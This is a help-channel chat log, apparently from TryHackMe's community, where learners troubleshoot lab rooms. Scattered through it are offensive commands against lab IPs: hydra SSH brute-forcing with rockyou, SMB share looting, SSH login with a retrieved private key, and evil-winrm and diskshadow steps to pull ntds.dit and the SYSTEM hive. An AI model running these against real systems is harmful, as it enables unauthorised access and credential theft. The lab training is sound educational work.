ok so itryed to login with ssh so i did ssh user@10.10.185.128

are you connected to the vpn ?

yes

can you show me the way you try to connect ?

try to remove remove the -l

yes i know i did that

make a little ip a s to make sure you are connected to the vpn

can i call you pix so you can understand better

ok hold on

how do i fix connection confused

try this 🙂

ive done that

Dumb question, but is there another way and what is it to open text files in Windows besides "FILENAME.txt", because for some reason it doesn't allow me to open it and instead just repeats it back to the command prompt

Nevermind, found another method

then whats the solution

what is ssh rsa

@lucid junco basic penetration testing

Can you link the room please?

https://tryhackme.com/room/basicpentestingjt

Okay, which task/command are you doing?

smbclient

to find the username and password

Of the user Jan?

lol what why did you give me the user 😦

i want to find out how to get the username and password using smb

Oops, sorry!

Do you have Enum4Linux?

Hi, I'm not sure if I'm at the right place. I'm in the Breaching AD room and got an error when running the command in task 3.

yup i did that already

not much info on that

#breaching-ad might provide faster help, as someone may have had the issue and got it resolved.

Hello every body i'm stuck in linprivesc in task5 i'm trying to download an exploit into a machine using SimpleHTTPServer and wget can u help me please ?

Thanks, Scubz

Gave +1 Rep to @lucid junco

Did you not get users from there?

nope nothing about users from there

What your machine ip?

why?

So I can check.

Your Target machine ip, not THM.

you mean my kali machine or my thm machine

The one that would appear there.

10.10.69.151

How to post an image with my message? I don't see a button or a feature to do so.

Strange, I got nothing from your IP

you need to verify

!docs verify

are you supposed to get something?

2 secs

The one on the right is yours, the one on the left is mine.

well its still running

and expires in 20 minutes

Try adding an hour and refreshing the machine page

Or try mine.

10.10.83.181

now its 10.10.57.222

ok

That new ip works for me now

oh nice lol let me connect now

You'll get the users from that.

Hi Scrubz, I'm verified 😆

You should be able to attach pictures now.

Thanks, Scrubz. Have an awesome day! 🙂

You are welcome, happy hacking!

@lucid junco im getting another problem

when im doing hydra

hydra symbol lookup error

What's your syntax?

hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.10.57.222

That looks right.

then why the error?

this is the error

Are you using the attackbox or your VM?

my VM

kali

sudo apt install libmongoc-dev -y

In a new command window

ok working now

thanks dude

just did a exploit with the outcome

• SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:) (encryption capabilities:AES-128-CCM) (signatures:optional) (guid:{69736162-3263-0000-0000-000000000000}) (authentication domain:BASIC2)
  [*] 10.10.155.203:445 - Host could not be identified: Windows 6.1 (Samba 4.3.11-Ubuntu)

Now im not sure what version it is is it SMB 1,2,3 or SMB 3.1.1.

Hey Everyone, I’m having sone trouble in Network Services - Enumerating SMB

Do more

It says to have a look around once I’m in SMB. I must be missing the right command, I’m having trouble viewing anything.

more filename

||more "Working From Home Information.txt"||

Thank you

Gave +1 Rep to @lucid junco

is there a way to do a hydra bruto force faster? becouse this is taking ages..

If it's done correctly a password crack shouldn't take longer than 5 minutes? * For THM anyway

well idk

ye im doing it in kali

Your choice of VM won't make a difference.

hydra -l jan -p /usr/share/wordlists/rockyou.txt 10.10.155.203 -t 4 ssh

the command i used

Try adding -f to the command.

IIRC Hydra will keep going even after the password has been found.

where sould i place the -f then

infront of what

I usually stick it at the end.

hydra -l Jan -P /usr/share/wordlists/rockyou.txt 10.10.155.203 -t 4 ssh -f

Still the same 44 tries in 1 min

-t 16

Increasing threads can increase speed

Working on Task 5 XPath Queries in Windows Event Logs room. I'm taking a big ol' shot at the dark with this guess for the first answer:

|| Get-WinEvent -LogName Security -FilterXpath '*/System/Provider/[@Name="WLMS" and TimeCreated[@SystemTime=2020-12-15T01:09:08.940277500Z] '||

can someone tell me how wrong I am? I have no idea what I'm doing here lol

Someone wanna give me a hint for privesc on road

that's what I thought it was when reading your message. good luck.

Hi All,
I have got a question regarding the Network Services room.
I'm doing Exploiting Telnet task, but I am stuck on tcdump listener. I'm not able to install it on the attacking machine. Can someone advise?
Still getting "Unable to locate tcdump package"

Are you using the attackbox or your own machine?

attackbox

Then there is nothing to install.
Just issue the command given in the task

I did typo

no comment...

For the Practical Injection do you just put http://10.10…./evil shell.php into a browser address bar? I can’t get the page to load

I get this

Hi, has anyone completed the HackingPark room recently? Task 4 Question#3 seems to be off and I can't get it. According to https://medium.com/@CyberOPS.LittleDog/tryhackme-hackpark-7d4f7fbfd561 the answer should be WindowsScheduler.exe but that doesn't work and neither does WScheduler.exe which is the name that shows up in the ps output.

Sorry, it’s in OWASP Top 10 Room.

No. I’m not. Sorry for the dumb question

Sadly I spend a lot of time on with there, my hacker level feels higher than my knowledge. I’ve just avoided connecting to the VPN

I got into this bc I got hacked so I’ve been jumping around a lot trying to learn the attack vector or method being used against me. Still can’t get ahead of the hackers which sucks but this stuff interests me.

I have a private computer, I just go to library during day bc I’m still pretty sure my home network isn’t secure. Sorry for the life story

I originally thought that, but I’ve been through 4 computers, changed ISPs, hired people. I’ve run out of answers but to learn the stuff

I had started the attack box before I asked for help. That’s why I didn’t think I needed to be connected to the VPN. I thought I was starting the attack box and connecting to that. Do I need to put the http://10.10…. in a shell on the attack box?

I’m

Hi, still on razorblack...
when i use the diskshadow it should map a new drive, correcte ?
then i can use copy-filesbackuppriviledge to get the ntds.dit file, correcte ?

As use h: from diskshadow but i cannot "cd h:", normal ?

hello any help with https://tryhackme.com/room/johntheripper0 task 10 rar2john "command not found"

on your own kali machine or on the attackbox?? for the attackbox check /usr/share/john/rar2john

attackbox looking now

eh meeps it don't recall where it is on the attackbox so lets bring out find command to find it find / -name rar2john

I think it's /opt/john

thanks for the help sorted now

Send a screenshot actually

@modest wasp and i will be glad to check it out if you have not finished it

Hi,
need your help with diskshadow.exe

When i use : expose %someAlias% h:

It should create a drive h: and i should be able to acess it, right ?

OMG, 2 days to figure out shadowdisk script needs a space at the end of each line !!! 😦

I’m on the Metasploit Exploitation room on task 5 exploitation and I can’t seem to create a session. The exploit I use is windows/smb/ms17_010_eternalblue. Could anyone help me with this?

Ohh ok thank you

How would I know what payload to use

I got it to work. Thank you so much! The LHOST was the issue. It fixed it when I changed it to tun 0. I didn’t have to change the payload

i try to download a file from evil-winrm without success

Evil-WinRM PS C:\tmp> download system

it says successful download but i cannot find the file on my local machine. I also ried with a full pass as destination

i feel dumb, but any help would be appreciate

use full path when downloading
download C:\Windows\System32\systemetc.

like : download c:\tmp\system /home/kali/tryhackme/raz0rblack/privesc/system

oh it's the raz0rblack room, nice
yeh, jus download C:\tmp\system should do

yes really nice.... but i lost my mind with diskshadow (missing space at the end of script line)

ohhh, looks like full path as source with C: and not c: is working (i hava the progress bar)

but it renamed the file on my local computer !

yeh, the filename is going to be the full path one

yep will try to specify name for ntds

razorblack is a really good room. My only remark would be the password reuse usage

Yeh but that's really realistic

thanks, I was able to complete it by removing the .exe from WindowsScheduler as suggested by @burnt rivet

Gave +1 Rep to @lone sandal

Hi, I'm stuck on task 3 of the NMAP room for the question: "
How would you activate all of the scripts in the "vuln" category?" the answer is --script vuln but it doesn't work

an area ?

Hey guys I’m struggling significantly on task 6 on Metasploit: exploitation. Does anyone have any tips?

you need to be a little more specific with what you are struggling because task 6 is big and has a lot of questions, share some more info, maybe some screenshots and for sure somebody will help you if possible 🙂

I can’t run the multi handler. I have the file on the other machine but I can’t figure out how to actually connect it to my host machine

what is missing? I don't think so because there are two variants of switches with space and equal

Change LPORT

liek that script vuln= ?

I can't I have to wait until tomorrow

for me it's --script vuln

it's good

-script=vuln

but what is the difference with -script and --script ?

So what do I do

SET LPORT <PORT> and then run and please double check if the firewall has allowed connection to that port

How do I do that

Do what?

Check if the firewall allowed connection to the port

https://www.digitalocean.com/community/tutorials/how-to-set-up-a-firewall-with-ufw-on-ubuntu-20-04

I guess this can help you, but read carefully what they are trying to share

I allowed it connection and it didn’t fix it

hi, i am wondering about something on the "kubernetes for everyone room".... i have supplied the THM website with the correct password for the question

i am trying to input the username i believe is associated with that password but it keeps saying it is incorrect... wondering if anyone has done this room? am i crazy in thinking the username begins with a "g" or nah?

I think username is incorrect

ok, i am just hoping to avoid it being a bug and then me finding out like 48 hours later that i had the right username all along

may i ask if you have done this room?

Yes I have completed the room

aight, thank you

Gave +1 Rep to @white salmon

i will slam some more coffee here and try again after lunch

I suppose there isn't any bug or something in the room

ok, blame the user then

😄

U can DM me if u want any help related to the room.

right on, i appreciate that... i might if i can't get it without losing too much more of my hair

I guess u can enumerate further more.

yes, that's the plan

🙂

And I hope you will get the correct username. @glossy widget

cheers

🥂.

?

ok so -script is the proper ?

it's --script ? but why on tryhackme
this not working?

yet on tryhackme it's --script=vlun that didn't work

yes it's good

Hi all, in the Network Services lesson, I am down in the Exploiting SMB section. I have gained access to the SMB share drive as an anonymous user. It asks "Who can we assume this profile folder belongs to?"

I don't know how to find this information. I've been reading online and cant figure out how to open these files like .profile or .cache. cat isn't working

Hi I’m in Network Exploitation Basics - Exploiting SMB. I’m getting asked for a password or I’m doing it wrong

The last question

Looking in how he works from home

Look*

You need to search his files available to you. The name is something like Directions for working from home

did not do this chall, do you really have an account named anonymous ? sound more like an ftp thing

Basic malware re challenges solutions help

Can you link the room?

I got access to the smb server using the username Anonymous and not using a password

gonna dig a little more and see if I can figure it out

The file name is “directions for working from home.txt”

i figured out how to open it, but not sure if I did it in a much more complicated way than necessary

I couldn't get cat to work in smbclient, so I downloaded the file to my own machine and used cat there

How did you download it to your machine? scp?

lcd

Thanks

Use “more” instead of “cat”
more [filename]

okay thanks

are these all files I should be able to open? or just the .txt one

I only opened “working…
You can cd into .ssh though

i didnt realize those were directories

lol thanks

Thank you

Gave +1 Rep to @burnt rivet

Download this file to your local machine, and change the permissions to "600" using "chmod 600 [file]".

Now, use the information you have already gathered to work out the username of the account. Then, use the service and key to log-in to the server.

What is the smb.txt flag?

Task 4 of Network Services.... am I supposed to use haschat or john to figure out the password?

I found the username from id_rsa.public

i assumed the "key" had something to do with the password hash from id_rsa

okay. guess I'm going down the wrong rabbit hole

How did you find John in the id_rsa? I’m having trouble in the same part

Wrong photo

by John I was referring to the password cracking tool. But based on Lassi's comment, it osunds like I dont need to use it

John the Ripper password cracking tool

It wasnt something I found in id_rsa

Im not really sure what Im supposed to be getting from the id_rsa file

Maybe they want us to do smbclient //[IP]/profiles -U cactus

right - but we found ||cactus|| from the id_rsa.public file

maybe im getting too caught up on id_rsa

the pasword - which I assume is in id_rsa

perhaps I wrongly interpeted "key" in the directions to mean "password"

I think we need to use the smbclient command again. Maybe with username cactus

This statement is confusing me. I’ve read the hashes a couple times. I think smbclient is the service and the key is id_rsa.
Do I need to be looking in the file or just using the file

Ya Im pretty lost. I think I used cactus to successfully log in without even putting in a password

but, Im back on the same screen

Yeah I did the same.

I assumed it was part of authenticating the user

SSH

alright I figured it out

thanks for all the help. That was tough

Thank you, I’m on the right path

Gave +1 Rep to @burnt rivet

have you gone on to Task 6?

No I haven’t figured out how to ash with key. Do I need OpenSSH?

how are you trying to log into ssh?

I’ve actually completed task 6 so I can help

oh okay. maybe you can helpe me with six and I can help you finish that one

youre on task 4?

Yeah

I don’t know how to ssh with a private key.

Is it?
ssh cactus@10.10.87.42 -i id_rsa

that is how I got in, I just had the -i id_rsa before the username and ip

What do you need help with on task 6?

This question: Based on the title returned to us, what do we think this port could be used for?

in my nmap scan, Im getting the port number and what service is running and that's it

Not sure what "title" they are referring to

Look for skidy

Take a screnshot.

I have an idea what it is

But I can't see it

Don’t overthink it. That’s what I did at first. Very simple answer.
a [blank]

do -A

I’m starting the machine now. I think I did a enum4linux scan

im trying a new scan to see if anything new pops up

going slow

It says in the question before “it is important to try every angle when enumerating. “
I’m not getting anything with my enum4linux scan but I remember using it a couple times when completing these

Thanks. What are they referring to “make sure you try every angle when enumerating”

Gave +1 Rep to @burnt rivet

This is what most of my scans are doing

So telnet into it?

That’s how I got the answer but I’m wondering if I skipped steps

Ive just been doing nmap scans

so far Ive discovered: ||port 8012 is open on tcp|| ...not getting much else

You can try rustscan it’s a bit faster

Oh, nvm, it seems you already found the port, didn't read your spoiler

Telnet into that… telnet [ip] [port]

This machine might be a bit finicky.
So give it enough time before going to scan it, like 10 mins.
Also I would suggest to go for a basic scan, so like a -sS for example, as the initial scan on all ports, rather then doing an advanced one.
Regarding speed, you could try adding -T4 --min-rate 10000 to speed it up

Beside that you already found the port, didn't read your spoiler

I guess I did it wrong. Good to know about the additional 10 minutes to give the machine after boot up.

thank you. that helped

Gave +1 Rep to @echo token

I think I did it wrong though. I have to jump around a lot to find answers so I could be screwing myself

ya this is the first room where I feel like Im left to figure stuff out before learning it first

They all have a question like that. I’m stuck on 1 question for all of them

Which task 4 question are you stuck on

I finished it, that picture was from yesterday

Thanks for your help with task 4

Gave +1 Rep to @modern ibex

Am I referring to the wrong file location for the wordlist?
Network Services - Task 10

Did you check if it's in the directory?

Yeah but it doesn’t look right

What does “l” mean? -before “rwxr”
drwxr = directory with permissions
What about l?

It means that it's a symlink.
But regardless, your rockyou wordlist needs to be unpacked first

Beside that, if you are using the provided attacking machine from THM, I highly suggest using the attackbox rather then the kali machine, since the latter is not getting updated/maintained anymore.
So by using the attackbox, you wouldn't have the issue with rockyou.txt in the first place

Sudo gzip?

This should be questions you can easily google

I couldn’t get the attackbox to do anything? Even like an nmap scan. It’s been randomly happening to me for a couple weeks, that’s why I’m using kali. I didn’t know that though so thank you

Gave +1 Rep to @left thunder

Ok? Well not sure what wasn't working with the attackbox, but the next time something is wrong with it, maybe address/ask in #site-support

Yeah I had googled it but I’m getting no such file or directory. I used:
sudo gzip -d /use/share/wordlists/rock you.txt

Look at the file name you are trying to unpack, you are not using the correct one

Think I got it. But somehow went from gs to gz?

Nope didn’t get it

-d seems fine to me?
It's still not the right file name you are trying to unpack

But he is using gzip, not gunzip, so I guess that's making a difference

I was able to unpack it, I had the wrong path for my hydra command

Thank you

Gave +1 Rep to @left thunder

I tried meet but now can’t find the ftp.txt

Guessing it’s something else

I used the -d and it worked but I won’t next time. What’s it do?

This is what happens with attackbox. I’m in Exploiting NFS

Anyone complete sea surfer room

#987417709392314378 and looks like only 0day has completed the room as of now

0 day of what

Oh user !

I'm really stuck at starting

There's only 2 ports

22 , 80

80 has apache index page

yeh, keep on enumerating or look in #987417709392314378 for hints if any 👀

This attackbox nmap scan just went for 15+ minutes and nothing

remove the -A flag, it's mostly useless and slows down everything a lot!

Hey guys, stuck on Ra1.1. I've reset the user's password but getting auth failed when trying to use it. Any ideas where I'm going wrong?

if you're at the inital stage, you can only use the reset creds with smb iirc

It is the initial stage and I am trying to enum smb

I would post a screenshot but I'm not able to for some reason

you need to verify

!docs verify

Ahaa got it. Thanks

sweet

Arggh thats frustrating! I ran the reset again and its now working

3rd time lucky